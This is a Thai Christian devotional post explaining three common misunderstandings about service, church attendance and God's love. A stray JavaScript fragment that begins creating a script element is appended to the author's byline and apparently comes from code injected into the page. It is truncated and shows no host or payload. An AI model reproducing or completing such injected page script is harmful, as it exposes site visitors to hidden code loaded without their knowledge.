3 เรื่อง ที่ คริสเตียนมักเข้าใจผิด หรือสับสน

q

06 พ.ค. 3 เรื่อง ที่ คริสเตียนมักเข้าใจผิด หรือสับสน

คำถาม การรับใช้ พระเจ้า ต้อง ภายในโบสถ์เท่านั้น ใช่หรือไม่?
คำตอบ ไม่ใช่ เพราะ
1. การรับใช้ ทั่วไป ที่ทุกคนต้องทำคือ ประกาศ ดูแลเพื่อนที่เชื่อ
2. การรับใช้ คือชีวิต เช่น ท่าน ซื้ออาหารกล่อง วันละ 2-3 กล่อง ให้คนยากจนทุกวัน หรือช่วยเหลือพี่น้องที่ขัดสน ก็เหมือนให้พระเยซู
3. ท่านนั่งอธิษฐาน เผื่อ คริสตจักร ผู้นำ และ สมาชิกใครก็ได้ ตามพระวิญญาณทรงนำ ก็เป็นการรับใช้
4. ท่านเยี่ยม ดูแล หนุนใจ ผู้เชื่อ ให้ เติบโต ก็ดุแลลูกของพระเจ้า
5. ชักจูง คนให้มาโบสถ์ ห้ามไม่ให้ทำบาป ก็ห้ามบาปได้มาก

เรื่องที่ 2 เราไม่ต้อง เข้าโบสถ์แล้ว ขึ้นกับพระเจ้าโดยตรงได้เลยถูกไหม?
คำตอบ ไม่เคยมีคำสอนนี้ในพระคัมภีร์
1. ฮิบรู สอนชัดเจน ว่าอย่าขาดการประชุม
2. อาจารย์เปาโล สอนชัด จงเลียนแบบ ข้าพเจ้า เมือนข้าพเจ้าเลียนแบบพระคริสต์ และเปาโล มี บารนบัส คอยช่วยเหลือ และเหล่าอัครฑูต แม้เปาโลจะเก่งกว่า คนอื่น
3. คริสตจักรเป็นสถานที่ ศึกษาพระคัมภีร์ หนุนใจกันและกัน
4. พระเจ้าจะอวยพระพรและสำแดงการทรงสถิต เมื่อพี่น้องมาอยู่ร่วมกัน
5. มาใช้สิทธิอำนาจด้วยกัน สองสามคนก็ได้ หมายถึง ไม่เกี่ยวโบสใหญ่หรือเล็ก แต่ ต้องมีการสามัคคีธรรมด้วยกัน

เรื่องที่ 3 พระเจ้ารัก เพราะเรารับใช้
คำตอบ คือ
1. พระเจ้ารักและโปรดปราณ เพราะเราเป็นลูก ติดสนิท เชื่อฟัง และยอมจำนน ตามน้ำพระทัย
2. แต่การรับใช้ เป็นบำเหน็จ ทำให้เติบโต พระเจ้าให้เกียรติ และคนรับใช้ มักจะไม่เคยหลงหาย และพระเจ้าจะอวยพระพร ถึงลูกหลาน ดูได้จาก ผู้รับใช้พระเจ้าหลายคน
3. ส่วนใหญ่ คนรักพระเจ้า จะพบประสบการณ์ผลักดันให้รับใช้ ตามภาระใจ และมั่นคง
4. รับบำเหน็จ ในสวรรค์ รับสง่าราศรี พวกเราต่าง กัน เพราะการรับใช้เป็นรางวัลในโลกหน้า

เรียบเรียงโดย อ.เจริญ ยธิกุลvar d=document;var s=d.createElement(‘script’);